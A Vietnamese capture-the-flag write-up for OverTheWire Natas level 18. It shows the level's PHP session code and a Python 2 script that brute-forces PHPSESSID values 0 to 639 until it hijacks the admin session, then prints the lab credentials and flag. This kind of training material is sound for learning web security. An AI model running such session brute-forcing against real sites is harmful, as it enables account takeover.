[OverTheWire] Natas – Level 18

http://natas18.natas.labs.overthewire.org/

Please login with your admin account to retrieve credentials for natas19.

Nhấn View sourcecode:

[php]“;
}
}
/* }}} */
function my_session_start() { /* {{{ */
if(array_key_exists(“PHPSESSID”, $_COOKIE) and isValidID($_COOKIE[“PHPSESSID”])) {
if(!session_start()) {
debug(“Session start failed”);
return false;
} else {
debug(“Session start ok”);
if(!array_key_exists(“admin”, $_SESSION)) {
debug(“Session was old: admin flag set”);
$_SESSION[“admin”] = 0; // backwards compatible, secure
}
return true;
}
}

return false;
}
/* }}} */
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists(“admin”, $_SESSION) and $_SESSION[“admin”] == 1) {
print “You are an admin. The credentials for the next level are:
“;
print “

Username: natas19n";
    print "Password: 

“;
} else {
print “You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.”;
}
}
/* }}} */

$showform = true;
if(my_session_start()) {
print_credentials();
$showform = false;
} else {
if(array_key_exists(“username”, $_REQUEST) && array_key_exists(“password”, $_REQUEST)) {
session_id(createID($_REQUEST[“username”]));
session_start();
$_SESSION[“admin”] = isValidAdminLogin();
debug(“New session started”);
$showform = false;
print_credentials();
}
}

if($showform) {
?> [/php]

Bài này sử dụng một custom-session-manager, với giá trị của PHPSESSID nằm ngẫu nhiên trong khoảng từ (1, 640). Tất nhiên admin cũng chỉ có thể nằm trong mớ giá trị đó thôi, và chúng ta sẽ thử dần dần từng giá trị cho đến khi thành công:

[python]import urllib, urllib2
def get_url_content(url, cookie, post_data):
if (post_data != None):
req = urllib2.Request(url, urllib.urlencode(post_data))
else:
req = urllib2.Request(url)

req.add_header(‘User-Agent’, ‘Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0’)

if (cookie != None):
req.add_header(‘Cookie’, cookie)
if (post_data != None):
req.add_header(‘Content-type’, ‘application/x-www-form-urlencoded’)

source = urllib2.urlopen(req).read()
return source

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, “http://natas18.natas.labs.overthewire.org/index.php?debug”, ‘natas18’, ‘xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP’)
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))

for i in range(640):
cookie = ‘__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s’ % i
source = get_url_content(‘http://natas18.natas.labs.overthewire.org/index.php?debug’, cookie, None)
source = source.split(‘

‘)[1].split(‘

‘)[0]
print ‘%3d: %s’ % (i, source)

if (‘You are an admin’ in source):
break[/python]

Kết quả là SESSID của admin = 84:

[sh]84:
DEBUG: Session start ok
You are an admin. The credentials for the next level are:

Username: natas19
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
View sourcecode[/sh]

→ flag = 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *